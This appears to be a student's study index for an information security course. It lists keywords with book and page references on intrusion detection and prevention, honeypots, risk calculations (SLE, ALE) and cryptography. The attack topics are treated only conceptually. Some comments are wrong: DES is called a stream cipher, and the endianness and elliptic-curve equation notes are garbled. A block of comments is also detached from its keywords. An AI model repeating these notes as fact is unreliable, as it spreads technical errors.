NIDS - Encrypted traffic                3   189
NIDS -Signature Quality vs. Quantity    3   190
NIDS performance limits                 3   191
statistical sampling analysis           3   192
NIDS cost                               3   193
TCPDump as NIDS                         3   195
NIDS - TCPdump                          3   195
Libpcap library                         3   195
WinPcap                                 3   195
Libpcap Products                        3   195
netranger                               3   195
TCPDump as NIDS adv. & disadv.          3   196
NIDS - Snort                            3   198
snort as NIDS                           3   198
rpcinfo -p                              3   199
rpc calls padded                        3   199
snort rule flexibility                  3   200
snort rules                             3   201
snort rules -simple                     3   202
snort rules -Advanced                   3   203
snort - Key points                      3   204
security information event management   3   204
siem                                    3   204
Nids - passive fingerprinting           3   206
Nids - active vulnerability           3   207
Nids - passive vulnerability          3   207
Nids Development                      3   206
ids blade                             3   207
wids wireless ids                     3   207
file integrity checkers               3   211
exclusive log monitoring              3   212
inclusive log monitoring              3   212
log monitoring                        3   212
hids advantage                        3   215
hids challenges                       3   216
hids recommendations                  3   218
hids developments                     3   219
tripwire                              3   220
ISC (internet storm center)           3   222

IPS                                   3   229
IPS &IDS                              3   229
ips -- how it stop attack             3   229
ips -- what is IPS is not             3   230
firewall as an IPS                    3   230
hips details                          3   232
hips                                  3   232
system call interception              3   232
hips advantage                        3   233
hips challenges                       3   234
tco of hips software                  3   234
hips management console               3   235
application behaviour hips            3   236
hips application behaviour            3   236
hips recommendations                  3   237
hips developments                     3   238
application shielding behavior        3   238
hips -zero day protection             3   238
NIPS - how it work                    3   238
nips deployment                       3   240

nips details                          3   241

zpha (Zero Power High Availability)   3   242
nips latency requirement              3   242
nips security                         3   242
multi resolution filter               3   242
Nips - multi resolution filter        3   242
nips rules capabilities               3   242
nips challenges                             3   243
nips passive analysis                       3   244

nips developments                           3   245

unity one product                           3   245
nips protocol scrubbing                     3   246
nips rate limiting                          3   246
nips to enforce org policy                  3   246
McAfee hips                                 3   249
IDS plus something                          3   249
ibm iss proventia                           3   249
ibm iss proventia G series                  3   249
ibm iss passive mode                        3   249
ibm iss inline simulation                   3   250
ibm iss inline protection                   3   250
x-force                                     3   250
firewall plus something                     3   251
check point vpn-1                           3   251
smartDefense                                3   251
interspect                                  3   251
norton internet security                    3   252
tipping point IPS                           3   253
tipping point IPS -- response mechanisms    3   253
threat suppression engine (tipping point)   3   253


risk management                             3   256
risk management focus                       3   256
cause,effect,response                       3   257
risk management goal                        3   258
best approach in identifying                3   260
risk analysis matrix                        3   261
risk management steps                       3   262
administrative controls                     3   262
technical control                           3   262
risk management emphasis                    3   263
risk forms                                  3   264
vulnerability                               3   265
threat                                      3   265
risk                                        3   265
risk                                        3   265
risk management questions                   3   266
risk uncertainty                            3   267
risk assessment (knowledge Vs best practice)    3    267
SLE (single loss expectancy)                    3     268
ALE (annualized loss expectancy)                3     268
SLE (single loss expectancy)                    3     269
exposure factor (EF)                            3     269
ALE (annualized loss expectancy)                3     270
ARO (annualized rate of occurrence)             3     270
quantitative risk analysis                      3     271
qualitative risk analysis                       3     271
business case Risk management                   3   273,274
business case Risk management                   3    274
Risk manage step1, threat Assess & Analysis     3    275
Threats Vectors                                 3    275

risk analysis purpose                           3    275

risk analysis matrix                            3    275
Risk outsider attacks - internet                3    276
Risk internal attacks                           3    277
Risk malicious code                             3    279
egress filtering                                3    279
asset identification and valuation              3    280
Risk manage step2, Identification & Valuation   3    280
Risk manage step3, Vulnerability Analysis       3    281
vulnerability analysis                          3    281
risk Evaluation                                 3    282
risk management step 4- risk evaluation         3    282
interim report                                  3    283
risk management step 5- interim report          3    283
cost benefit analysis                           3    285
cost of countermeasure                          3    285
final report                                    3    286
short-term solutions                            3    286
long-term solutions                             3    286
business case summary                           3    287
notes

at Christmas 1994, on Tsutomu Shimomura's home network; information security professional
Shimomura had 3 machines running Solaris 1 (SunOS 4)
means I trust the information and connections that come from another familiar computer (didn't require a password)
can return information about users on a particular system, used for reconnaissance, service port 79 TCP
allows a user to use r-commands, includes machine and local user account, without a password
allows a user to use r-commands, includes machine and local user account, without a password
lists file systems on a remote host, NFS file system
gets a list of all RPC services and details about them on a remote host
port 513 TCP, rlogin command, allows communicating with a remote machine
port 513 TCP, rlogin command, allows communicating with a remote machine
it only works with idle machines, so you need a machine that doesn't accept a lot of connections
port 514 TCP, non-interactive commands on a remote host using the rsh command
allows all users to connect remotely without a password: "accept connection from any user on any machine"
-l username, starts the terminal session on a host
consists of three parts: prevention, detection, response
Mitnick, timely patching, before or after the exploit
all information about a user: home dir, shell, mail status
distributed as software agents that can be monitored from a central location for a large enterprise
consists of three parts: prevention, detection, response
detection, patching, disable unused services, network vulnerability scan, HIDS, NIDS, firewalls
logic bombs, trojan horses, trap doors (backdoors)
small programs or sections of a program triggered by some event such as a date or a time
helpful or entertaining programs that perform actions the user didn't intend
are bits of code embedded in programs by the programmer to gain access at a later time (backdoor)
something that looks vulnerable but acts as an alarm or triggers actions if an intruder attempts to exploit the flaw; not a honeypot or honeynet
spoofs a victim IP and sends an echo request, broadcast, to a network
filling a victim's buffer with a lot of SYNs
attacker recruits zombies; tools: TFN, Trinoo, Stacheldraht, TFN2K
a DDoS agent
a DDoS agent
a DDoS agent
DoS attack, calls fork() to create a new process like the original, done repeatedly
someone has physical access, can shut down
used to execute code on a host, no boundary check on the inputs
excessive content injected by an attacker to overwrite the return address with an address of his own
the point at which the inserted payload is able to control the CPU or crash the program
the most significant bit is on the left side of a byte x00000000, e.g. IP networking
the most significant bit is on the right side of a byte 00000000x
which part of a byte is considered most significant: big endian left, little endian right
little endian has to be converted to big endian in network connections
all connections are in big endian
is used for arbitrarily large buffers, the resulting pointers are called procedure, hard for buffer overflow
no-operation instruction, can be used to reach the payload
starts with 00 in the address, would indicate a Windows box, limits the size of the payload
an attempt to gain access to a system by bombarding it with possible guesses until the correct one is found
allows administrators into a system to troubleshoot a problem remotely, GoToMyPC
can reveal sensitive information useful for attacks
exploiting the difference between a security control and the time the service is applied
time of check: check the security; time of use: service time; race condition attack
calls for software or hardware that need to be handled; an attacker can use it to call malicious code
compromise the integrity of a program or data, create backdoors, viruses, worms
subvert kernel, process management, file access, security and memory management functions
cracker tool is inserted stealthily into the local OS and subverts it
loadable kernel modules under Unix are called device driver files
using the Microsoft development kit for Win2003 server
are called device driver files, used in creating rootkits

control what is allowed across some point in a network, as a mechanism to enforce policy
dedicated appliance, hardware or software in a network device, software on a computer
reduce risk, increase privacy, enforce security policy
a technique to determine what the attackers are going to do before they do it
reduce risk, increase privacy, filter communication, encrypt communication, records (logging), noise filter
dialup, VPN may bypass; organization may only depend on them; attacks on the application layer
the attacks that bypassed the firewall
default allow restrictive, default deny: permissive
filtering applied to incoming traffic; most firewall rules are applied to inbound traffic
applied to outbound traffic, very useful as an intrusion detection system, virus trying to connect out
means trying to protect others by filtering your outgoing traffic
design a network into trusted and untrusted zones, DMZ, risk of being compromised
allow limited access from a zone to a previous zone, colors
TCP 3306, web server connects to this port to query data
low end, very fast, can easily be bypassed; if ACK is set, existing connection
used to learn firewall rules: if an nmap port probe gets a RST/ACK, allowed; if no response, denied
tracks the progress of the connection; no inspection of data is performed
identifies the relationship between the source and destination address
first step in the three-way handshake
second step in the three-way handshake, SYN-ACK received
third step in the three-way handshake
a host wants to terminate the connection
the other host received the FIN and acknowledged
both sides finished communication
no connection between the two hosts
issue for stateful firewalls because a legal packet can't pass, UDP -> port unreachable
stateful firewall can track FTP, H.323, SIP connections
slowest, inconvenient to manage, traffic regenerated, painful in a large organization
proxy firewall uses them to keep connections straight
software residing on each computer
most popular personal firewall, has a set of rules for applications
all infected systems listen on TCP port 17300
using a log to know there is a virus infection inside your network
network address translation to addresses in RFC 1918
10.0.0.0-10.x.x.x, 172.16.0.0-172.31.x.x, 192.168.0.0-192.168.x.x
private range
translating traffic from multiple internal sources to a single external address
is an information system whose value lies in unauthorized use of that resource
a single file with special attributes
dedicated server, state machine, service, virtual server, honeytoken
civil issue, attacker may harm other networks from your honeypot
when an attacker breaks into a site and uses it to attack other sites
weak, unpatched, vulnerable, host trap, tactics, motives, tools
to differentiate between legitimate and illegal traffic: anyone who connects to it is an attacker
insight (tactics, motives, tools of attackers), reduce false positives and false negatives, additional DID
attackers use the identity of a honeypot to throw off admins by spoofing traffic from legitimate hosts to the honeypot, feeding the honeypot incorrect info
fingerprinting, limited view, resource burden
purpose, location, scope, interaction

can design any honeypot as a specific OS, using the nmap and Xprobe databases


start with low-interaction, unused address space, monitor the honeypot out of band

Honeypot tool

reconnaissance, resource protection, ROI
the financial benefit or return received from a given amount of money or capital invested into a business
like ROI, specific to security
ROI = (gain - expenditure) / (expenditure) * 100%
for evaluating whether to go ahead or not with the purchase, for predicting revenue
5, vulnerabilities are gateways for threats, little scanning little removing
worm, virus, employee emailing intellectual property to a computer
outside attack, inside attack, attack from malicious code
the countermeasure they use to fight threats once they are found

worm,wireless,modems,tunneling,vpns,social engineering,home laptops
commercial war dialer,scan range looking for modem with auto answer
auto-answer,bi-directional connection,connection to external isp
p2p programs use it to send data,stunnel can be used for this,port80,port443
describes an attempt to manipulate a person to provide information or access to information
human based: urgency,third person authorization;computer based: pop-up windows,mail attachment
policy,procedures for granting access,educate users to report any malicious activity
audit,proxy firewall,IDS,IPS,educate users on social engineering
can detect unprotected netbios file shares
like ping using tcp crafted packets, used to assess firewalls
uses different spoofed ip addresses to scan so it is hard to detect who the hacker is
test firewall rules,net performance,fingerprint os,audit stacks,transfer files,check if a host is up
from 1995 to 2009
first vulnerability scanner
uses syn/fin scans to evade firewalls
provides a web based interface for a database for analysis of data

non-programmers can make worms of any vulnerability
most prolific e-mail mass mailer,aug 2003
exploitation suites started in 2007
scan 0-65535 twice,once for udp and once for tcp
queries open ports to attempt to know which application is running on port
port 70 tcp
might be listening but nmap can't tell for sure
is a not-well-known port so nmap can't tell what is running on it
use hostnames,wildcard,ranges,cidr notation,combined
little more difficult to detect,random selection of ip range
tell you which machines are up
default scan type for unprivileged users

nmap relies on receiving icmp messages,slower than tcp scans
set limits on how many icmp packets they are willing to send out during a certain time
nmap signature to identify different os.
scan your own systems,scan,report
nessus attack scripting language used for writing plugins
run the actual scans and send results to a nessus client
can run from different machines,control the scan process
red=critical,orange=moderate,yellow=moderate low,gray=low
passive or active,netstumbler or kismet
wireless active scanner,retrieve: wireless channel,access point mac,ssid,signal and noise level
intrusion detection tool,wireless passive scanner,attacks against LEAP protocol
lightweight kismet, deployed in client/server infrastructure to monitor wireless for attacks

green=secure,red=factory settings,
is driving with the equipment to detect wireless networks

metal-screening inside exterior walls to reduce wireless signals
identifying systems with modems sitting inside the network
free,can skip numbers, war dialing tool
heat ventilation air conditioning may use an active phone system,skip them when running the war dialer
monitor call logs,use honeypot,scan and take action
in war dialing will allow you to scan more numbers in a shorter time
used to determine the validity of identified vuln
war dialing,war driving,sniffing,eavesdropping,dumpster diving,social engineering

a subsequent pen test can verify where these false positives can be ignored

alarm system,needs incident handler,not a low maintenance tool
true positive, false positive ….
an event of interest ,can be anything the analyst want to identify with ids
true hacking
ids generates alarm for false hacking,burden on admin
true ok,ids doesn't generate alarm for this
false ok this is bad,doesn't generate alarm for the analyst,worst case
passive sensor,uses signatures,anomaly,application protocol analysis
checksum of file,string search,protocol,address,port,payload contents,flags,traffic flow analysis
no operation,used in buffer overflow attacks,0x90 value
inclusive detection method,for specific protocols or applications
exclusive method,standard definitions,implementation nuances,changes to protocol
header only,very fast
header and data,slow,anomaly analysis,protocol analysis
uses combination of deep and shallow inspection
attackers change data characteristics to pass the ids,de-normalize traffic
ids take the data to baseline before analysis
audit for other controls ,….
labeling information with unique keywords,project id
topology,encrypted traffic,quantity,quality,performance,very costy
spanning ports,taps,affect switch performance
solution for the spanning port,works also on fiber,no impact on performance,need a tap for each wire
Use anomaly analysis -increase false negative-

bandwidth, decryption, lots of small packets decrease performance
a manageable subset of traffic is a desirable alternative to complete failure when there's too much traffic




open-source,designed to retrieve data from the kernel and pass it to the Application Layer (TCPDump Linux)
packet capture for windows (the program running on windows is called WinDump)
Shadow,Snort,Cisco IDS and NFR
cisco ids




list the available rpc ports on a remote host
32-bit words-always carry a lot of zeros
snort user community develop new rules to detect the latest exploit,virus and worm or other attack technique
basic (pass- log-alert),advanced (activate-dynamic)




a security information event management station,combine multiple sources into one machine
a technique to monitor network traffic and identify the hosts' operating systems
like vulnerability scanners used by nids
new method to identify vulnerable services,characteristics of applications

Module inserted into the switch,custom hardware
wireless ids,detect rogue access points
calculate hash,then compare
a list of keywords or phrases that define event of interest,don't match ---> alert
a list of keywords or phrases that define event of interest,match ---> alert
inclusive or exclusive
notable encryption, identifies inside attacks against system, details inside the network not perimeter only
can be used to identify attacks & identify policy violations
monitor application level, protect web sites, Appliance platform support (routers, switches), morphing with HIPS integrity check as a HIDS, & can react to changes to monitored files by restoring backup as a HIPS.
is a file
is a powerful tool for detecting rising internet threats (isc.sans.org)

will try to stop attacks before they are successful, but it prevents passively unlike Firewall.
IDS is deployed PASSIVELY, while an IPS is traditionally deployed INLINE
by: sending RST & modifying firewall rules.
it's a real internet prevention system but it's static.
stop known & unknown attacks,system call interception,monitor traffic on network, file integrity & app behavior; use combination of signature analysis and anomaly analysis to identify attacks
hips tools
hips software inserts its own process between application and os resources
the ability to STOP attacks from being successful, +all the adv of HIDS
False positive, implement& maintenance, limit App support, more sys resources, limited nodes for Mang console
additional burden of hips,needs more processing & possibly reduces your workstation lifecycle
max about 3000 node per one console
manufacture select supported App and record the intended functionality of the App in normal use
Document procedures, develop mang policy, don't blindly install s/w updates, don't rely solely on hips.
zeroday vuln protection, application shielding behavior,
locks an application into a sandbox where it is not permitted to communicate with other applications
zero day protection build into hips

before the firewall or behind firewall, it depends.
inline causes single point of failure for network,uses custom ASICs to support high-speed analysis with complex inspection, uses data normalization & assembly techniques on aggregation traffic, hierarchical rule classification scheme used to classify and identify traffic
zero power high availability for nips ,will re-route network traffic when IPS device lose power
traffic analyzed should be in the milli-second range
must be against compromise, configuring nips without ip or mac on data interface
at nips, simple tests applied to traffic, then more tests to it, this enhances system performance
packet header info, transport layer session info, App layer session info, payload string matching, App layer analysis, complex regular expression matching
false positives drop legitimate traffic,more false negatives than ids, Latency, hasn't extensive rule-base for identifying attacks on the network, unlike NIDS.
to reduce false positives by identify host OS, network architecture, vulnerabilities on network.
improved throughput & response time, automatic analysis/signature updates, environmental anomaly analysis, protocol scrubbing, limiting stream to apply QOS, enforce organisation policy by dropping traffic of unauthorized Apps
tipping point Nips product can handle >2gb throughput with latency less than one millisecond.
can be used to clean garbage from the traffic stream,send rst to connections to tear them down
to apply qos mechanisms to network traffic
by drop traffic from unauthorized Applications like peer-to-peer applications
ids+something, use system call interception,was Entercept product

nips, G-series provide high speed deep inspection, M series provide unified threat management
throughput: from 100mb to 2gb, Modes: passive monitoring, inline simulation, inline protection
G series, like IDS, block malicious traffic by sending tcp rst to offending connection
monitor only mode, it provides monitoring on live traffic to tune your policies before live implementation
full on Nips,all malicious traffic blocked
a division @ ibm iss, responsible for staying on top of security research and vulnerability detection.

firewall plus something
help against worms,trojans,integrated into vpn-1
internal security gateway that builds SmartDefense technology
Antivirus plus something, ips, can report to centralized management console
an Extra Widget, can limit traffic to apply QOS, block applications like peer-to-peer
Notify, Report, Limit, Block
patented tech for tipping point, uses parallel field programmable gate arrays (FPGA), ASIC H/W to perform deep packet inspection

the art of analyzing threats and vulnerabilities and determining the impact on enterprise
to reduce the risk until it is in acceptable level
determine the risk,analyze the impact of risk,determine action to handle these risks
identify,measure,control and minimize likelihood of attack
is to concentrate on protecting areas that if compromised could incur the most damage
the x-axis is severity of consequences,y-axis is probability (likelihood)
set security infrastructure,design controls for each tech,……..
policies,procedures,end-user security awareness program
technology-based solution example(Firewall,IPS,anti-virus ,etc..)
focus on the process not just series of actions
information security risk is one form of multiple risks
is a weakness in the system that can be exploited or a weakness that could lead to system compromise
any event that can cause an undesirable outcome or someone exploiting this weakness and compromising that system
equal vulnerability * threat
you have to link the vulnerability and threat before talking about risk
to decide between accepting, mitigating or transferring the risk, they are: what could happen? how bad? how often does it happen? how reliable (degree of uncertainty)?
risk requires uncertainty with probability from 0 to 1, people always express it as a percent
for technical people it's easier. According to the standard or best practice, you could avoid risk after deploying a standard like ISO standard.
the loss from a single event, if you had been exploited what it would cost you
annual expected loss based on a threat, SLE * Multi-hits of exploit
Asset value * Exposure factor, if conference room=$100,000 and terrorist attack cause 50% loss --> SLE= $50,000
the percentage of loss a threat event would have on asset, in terms of 0--> 100 % loss to an asset
ALE - Multi-Hits, ALE=SLE * annualized rate of occurrence
is the estimated frequency at which a threat is expected to occur, could be easy to calculate or very complex
far more valuable as a business decision tool,work with metrics, Dollars, Monetary loss value.
easier,identify high risk areas, [low, medium , high] risk categorization

if you can't prove that systems are @ risk, it'll be harder to get funding for your recommendations. You can use some existing resources of data like F/W or log system to prove it to them, show them a "smoking gun".
identify type of threat,look for evidence, two outsider attacks, two insider attacks,malicious code
outsider attacks from (Network & telephone), insider attacks (local network & local system), malicious code
1- Identify existing countermeasures, threats and vulnerabilities. 2- support expenditure (price) of resources and cost effective safeguards. 3- Aid in selection of cost-effective countermeasures to reduce risk to acceptable level
provide the best way to focus on the real threat by focusing on the threat vectors in the matrix.
use newspaper, hacking web sites, firewall & ips logs, scan network with SNMP to look for other routes & backdoors, try to connect your wireless from parking lot
use HIPS, windows event log, tcpwrappers, honeypots, unix Xinetd.
Virus scanning, HIDS (Tripwire unix & windows), Egress filtering catch worms
excellent way to detect systems infected with malicious code because they often use spoofed IP address
risk management step2,understand the quantitative analysis of your assets
asset identification and valuation
vulnerability analysis,
risk management step3,new discovered and old
risk management step 4,calculate ale
risk evaluation
risk management step5,project summary,asset identification,plan to recommendations
interim report
comparison between the cost of implementing countermeasures with the value of reduced risk
initial cost+labor cost+life cycle cost
interim report+safeguard selection+risk mitigation analysis+cost benefit analysis+recommendation
short amount of time for little or no cost
involves redesign of infrastructure and increased safeguard solution cost
              module 13
module 14
module 15
module 16
module 17
KeyWord                                     Book   Page   Comment
Cryptography                                 4      6     means hidden writing
Encryption                                   4      6     coding a message in such a way that its meaning is concealed
Decryption                                   4      6     is the process of transforming an encrypted message back into its original plaintext or cleartext.
Ciphertext                                   4      6     is a message in its encrypted form.
Cryptographer                                4      6     who creates encryption algorithms
Cryptanalysts                                4      6     who dedicate their lives to breaking ciphers
Cryptology                                   4      6     generic term for the study of both cryptography and cryptanalysis
David Kahn                                   4      7
Julius Caesar                                4      7
Bruce Schneier                               4      7
Security by Obscurity is no Security         4      8     proprietary algorithms are high-risk, because they are not available for public scientists to check the cipher
CSS - (Contents Scrambling System )          4      8     encrypt data on dvd
Tamper - proof                               4      8
DeCSS                                        4      9     Decrypt data on dvd

Beware of Overconfidence                     4      10    even if someone knows how the algorithm works, without the key he should still be unable to decipher the message, you must protect your key

Goals of Cryptography                        4      12    CIA, Non-repudation
Confidentiality                              4      12
Authentication                               4      12    validating the authenticity of the person with whom you are communicating.
Integrity                                    4      12    prove the message has not been tampered with
Non-Repudiation                              4      12    able to prove in a court of law that someone has sent the message.
ENC - (Digital Substitution) [encryption]    4      14    it's a digital substitution NOT encryption
Digital Substitution [encryption]            4      14
XOR function                                 4      14
Digital Substitution [Decryption]            4      16
OR function                                  4      16
Symmetric Encryption basic techniques        4      17    Basic techniques: Substitution, Permutation, Hybrid
Encoding                                     4     none   the difference between encoding & encryption that the key in encoding is well-known but in encryption is secret.
Arbitrary Substitution                       4      18    use one-to-one substitution of characters.
Rotation Substitution                        4      19    use one-to-one substitution of characters, Rotate the alphabet by X characters.
Caesar Cipher                                4      19
ROT-13                                       4      19
Permutation                                  4      21    also called Transposition, change the character from its position not the char itself.
Transposition                                4      21    also called Permutation, change the character from its position not the char itself.
Block Ciphers                                4      22    encrypt one block of data at time
BLOCK cipher - modes                         4      22    there are four modes and the mode will affect the strength and performance of the cryptosystem: ECB, CBC, CFB, OFB
ECB - (Electronic Codebook mode)             4      22    Two identical plaintext block will generate the same cipher block, it's susceptible to brute-force attack

CBC - (Cipher Block Chaining mode)           4      22    plaintext is XORed with the previous ciphertext block, in this mode Two identical blocks of plaintext never encrypt to the same ciphertext

CFB - (Cipher feedback mode)                 4      22    it is stream cipher used for encrypted interactive terminal
OFB - (Output feedback mode)                 4      22    like CBC but prevents the same plain text from generating the same ciphertext by using internal feedback mechanism.
DES - Data Encryption Standard               4      22    it's a very common stream cipher, it uses 64-bit block and 56-bit key.
Stream Ciphers                                4    24     operates on a single bit, highly dependent on the randomness of the keystream, keystream length must = plaintext length, and has a vulnerability to Noise during transmission.
Keystream of stream cipher                    4    24     keystream length must = plaintext length, generated at both sending and receiving ends.
autokey of stream cipher                      4    24
self-synchronizing stream cipher (auto-key)   4    24
synchronizing stream cipher                   4    24     unpredictable to eavesdropper
cryptosystems types                           4    26     3 general types: Secret Key(symmetric), Public Key (asymmetric), Hash (one-way transformation)
Symmetric Key Cryptosystem                    4    27     secret key encryption , Example, DES,3DES,AES,Blowfish,RC4,IDEA
Symmetric Key Cryptosystem                    4    27     fast, require secure channel for key distribution, no technical non-repudation

Asymmetric Key Cryptosystem                   4    28     aka "Public - key", Slow, public key widely distributed within digital signature, technical non-repudiation via digital signature

trapdoor function & example                   4    28     mathematical functions which are easy to calculate and very difficult to inverse-calculate, like: (Multiplication & factorization) and (Exponential & Logarithms), used in Diffie Hellman
Public key                                    4    29
Private key                                   4    29     If I encrypted the message with my private key, the others could decrypt the message with my public key
Public-key crypto - Who invented it ?         4    29
Diffie-Hellman Key Exchange                   4    30     Diffie-Hellman is used only for key exchange.
Hash Function                                 4    32     one way algorithm, the key length is the Hash length, like: MD2, MD4, MD5, RIPEMD-160, SHA-1, SHA-2
Hash Algorithm                                4    32     are effective due to the extremely low probability that two different plaintext have the same hash value
Message digest                                4    32
MD2 - Message digest 2                        4    32     128-bit hash
MD4 - Message digest 4                        4    32     designed for fast processing in software, also 128-bit hash
MD5 - Message digest 5                        4    32     slower that MD4, but work on weaknesses reported on MD4, 128-bit hash
SHA - Secure hash algorithm                   4    32     Secure Hash Standard (SHS), 160-bit value
Steganography                                 4    34     hiding the data in carrier file ( medium jpg,.doc,.wav,etc…)
Steganography - carrier or host file          4    34     used to hold the hidden data ,word ,bmp,jpeg,wav,movies,HTML files
Covered writing                               4    34
Crypto vs. Stego                              4    35     crypto provides confidentiality but NOT a secrecy

Steganography Does not guarantee Safety       4    35     secrecy provided by stego is great but data protection still relies on the encryption algorithm used, always try to encrypt data before using stego

Cryptography - Detection                      4    36

Histogram                                     4    37     it's a Graph that represents the number of occurrence of data in a given distribution of data (frequency of characters varies great)

Steganography components                      4    38     Host file (is the medium used to hold the hidden data) and the carrier (image, word doc, movie, sound,...)
Stego types                                   4    39     1- Injection, 2- Substitution, 3- generate new file

Stego-injection                               4    40     we place the information into "holes.", he meant unused areas of the file, the biggest problem of injection type is that the size of the carrier increases.

snow + options (injection Stego)              4   40-41   is command line program and tools for injection
Stego-substitution                            4    42     most popular method used and file size of the carrier remains the SAME by replacing useless data in the host file. Like: Least Significant bits (LSB) in the color table of a graphic
Stego-generate a new file                     4    43     hidden data used to generate a New File, No host file is needed
cryptosystem                                  4    50     main goals: confidentiality,integrity of data, authentication, and non-repudiation. There is NO availability
trapdoor function & example                   4    50     allows a message to be decrypted using a different key than the one used to encrypt the message. If the msg is encrypted by the public key, then the trapdoor is the private key
one - way function                            4    50     reveal the time and space required to execute intractable problems
Algorithm computational complexity            4    51
computational complexity                                            4    51     of a crypto algorithm

Big-O notation                                                      4    51     used to give a general idea of how many operations a problem takes to relative the input size n, used as indication of a problem's complexity

quadratic time                                                      4    51     O(n^2)
cubic time                                                          4    51     O(n^3)
constant time                                                       4    51     O(1)
linear time                                                         4    51     O(n)
Tractable problem example                                           4    51     easy problems that could be solved in a polynomial time, the relation between the input size and number of operations required to solve the problem is constant, linear, quadratic or cubic
Intractable problem example                                         4   51-52   Very hard problems that can't be solved in a polynomial time (Asymmetric encryption), like exponential O(2^n), superpolynomial, cubic-time algorithm, exponential-time algorithm
exponential O(2^n)                                                  4    51     an example of intractable problems.
superpolynomial                                                     4    51     an example of intractable problems, something between polynomial and exponential, more complex & hard.
cubic-time algorithm                                                4    51     an example of intractable problems. And could take thousands of years to be solved.
exponential-time algorithm                                          4    51     an example of intractable problems. Could take longer than the universe to be solved.
Intractable - factoring integer problem                             4    53     Difficulty of factoring a large integer into its two prime factors, hard problem solved by trial & error, used by RSA
factoring integer problem - Intractable problem                     4    53     Difficulty of factoring a large integer into its two prime factors, hard problem solved by trial & error, used by RSA
Intractable - discrete logarithm problem                            4    54     a^x mod n = b, mod (means remainder), very difficult to be solved, used by: EL-Gamal, Diffie-Hellman, Schnorr signature scheme, digital Signature Algorithm
discrete logarithm problem - Intractable problem                    4    54     a^x mod n = b, mod (means remainder), very difficult to be solved, used by: EL-Gamal, Diffie-Hellman, Schnorr signature scheme, digital Signature Algorithm (DSA)
Schnorr signature scheme                                            4    54     an algorithm that uses the intractable problem of discrete logarithm for finite fields
DSA - digital Signature Algorithm (DSA)                             4    54     an algorithm that uses the intractable problem of discrete logarithm for finite fields

Intractable - discrete logarithm problem applied to elliptic curve  4    55     hard problem, use Elliptic Curve Cryptosystems (ECC) which offer [Higher speed, lower power, tighter code], used by: Elliptic Curve EL-Gamal, Elliptic Curve Diffie-Hellman, Elliptic Curve Schnorr signature scheme, Elliptic Curve digital Signature Algorithm (ECDSA)

Elliptic Curve EL-Gamal                                             4    55     use Difficulty of solving the discrete logarithm problem as applied to Elliptic Curve (intractable problem)
Elliptic Curve Diffie-Hellman                                       4    55     use Difficulty of solving the discrete logarithm problem as applied to Elliptic Curve (intractable problem)
Elliptic Curve Schnorr signature scheme                             4    55     use Difficulty of solving the discrete logarithm problem as applied to Elliptic Curve (intractable problem)
ECDSA - Elliptic Curve digital Signature Algorithm                  4    55     use Difficulty of solving the discrete logarithm problem as applied to Elliptic Curve (intractable problem)

ECC - Elliptic Curve Cryptosystems                                  4    55     provides Higher speed, lower power consumption, and tighter code

DES - Data Encryption Standard                                      4    57     2^56 key size, 64-bit (8-bit for parity & 56 key) block cipher. Fast, uses (16 rounds)
DES - four operation modes                                          4    57     it has 4 operation modes like any block cipher: ECB - (Electronic Codebook mode), CBC - (Cipher Block Chaining mode), CFB - (Cipher feedback mode), OFB - (Output feedback mode)
DES weakness                                                        4    58     not secure due to its key size, and not because the algorithm has been broken
DES is not group                                                    4    59     this means that multiple DES encryptions are not equivalent to a single encryption. THIS IS A GOOD THING
DES advantage                                                       4    59     DES algorithm is not a group, this means that multiple DES encryptions are not equivalent to a single encryption, so Multiple encryption will increase the security.
algorithm is group                                                  4    59     means that encryption multiple times is waste of time
DES-Meet In the Middle attack                                       4    60     only twice the work of brute-forcing DES . Attacker has the cleartext and ciphertext
Double DES                                                          4    60     doesn't increase the effective key size significantly, 2^57 key size
Triple DES                                                          4    61     last release, can be configured to use either 2 or 3 unique keys, 112-bit (2keys), 168 (3 keys)
Triple DES                                                          4    61     execute 48 rounds (3 * 16 round)
AES - Advanced Encryption Standard                                  4    62     has three key size: 128-bit , 192-bit , and 256-bit
AES - evaluation criteria                                           4    62     security, cost, and algorithm and implementation characteristics
AES algorithm details                         4    64     the algorithm details with Functions.
AES basic functions                           4    65     AddRoundKey(), SubBytes(), ShiftRows(), MixColumns()
S-box substitution                            4    65
AES development                               4    66
RSA                                           4    67     most common asymmetric key encryption, it can be used to support both encryption and digital signature, it's a central part of Secure Socket Layer (SSL)
RSA vulnerability                             4    67     RSA vulnerabilities come from: 1- poor RSA implementation, 2- using small key length
RSA                                           4    67     the security of cryptosystems comes from the secrecy and size of the private key
RSA vs. DES                                   4    68     DES is 100 times faster than RSA.
ECC - Elliptic Curve Cryptosystem             4    69     it can be used to support both encryption/decryption and digital signature, high security even with small key length (higher strength per bit), high speed implementation, low process power
ECDLP - ECC intractable problem & sol         4    70     Y^3=X^2+aX+b, Pollard rho-method is the best-known solution for ECDLP
Pollard rho-method                            4    70     is the best-known solution for ECDLP, and it is fully exponential.
Key Length Comparison                         4    71     compare keys of: 3DES, AES, Diffie-Hellman, RSA, ECC key length.

Known Plaintext attacks                       4    73     cryptanalyst knows: 1 plaintext + 1 ciphertext, wants to know: key or another algorithm to decrypt any msg with a key the cryptanalyst knows

Chosen Plaintext attacks                      4    73     cryptanalyst knows: 1 chosen plaintext + 1 ciphertext,
Adaptive chosen Plaintext attacks             4    73     special case of the chosen-plaintext attack, cryptanalyst knows: many chosen plaintext + many ciphertext
crypto attacks - how they can be guarded      4    74     by: 1- keeping plaintext secret or deleting it if not needed, 2- preventing mechanisms that allow the attacker to encrypt random msgs using your secret key.
Ciphertext only attacks                       4    74     cryptanalyst knows: ciphertext only , no plaintext, the goal: recover one plaintext or key
chosen ciphertext attack                      4    74     cryptanalyst knows: ciphertext + plaintext, this attack is mainly used against asymmetric key (public-key) ciphers
chosen key attack                             4    74     cryptanalyst knows: specific relationship between the keys only
Birthday attack(Birthday paradox)             4    75     used with hash attacks
Applying cryptography to the network          4    80
clear text protocol                           4    81     telnet,rlogin,rsh,rexec
Applying encryption to the application layer  4    81     APOP, AFS, Secure Shell; APOP protects the authentication message, not the e-mail message itself

Applying encryption to the transport layer (TLS)   4    81     TLS protocol is to provide privacy and data integrity between two applications, it's comprised of two protocols: record and handshake

TLS - Record Protocol                         4    81     which is used to securely transfer application data
TLS - Handshake protocol                      4    81     which is used to negotiate the details of secure session
Applying encryption to the network layer      4    82     VPN
Confidentiality in Transit                    4    84
Private circuit (network)                     4    84     pro:dedicated lines, Cons:expensive
VPN - Virtual private network                 4    85
VPN - advantage                               4   86-87   Flexibility, lower cost than leased lines.
VPN - disadvantage                            4    88     IPS cannot examine the information in the message (because of encryption), therefore QoS for VPN is more difficult
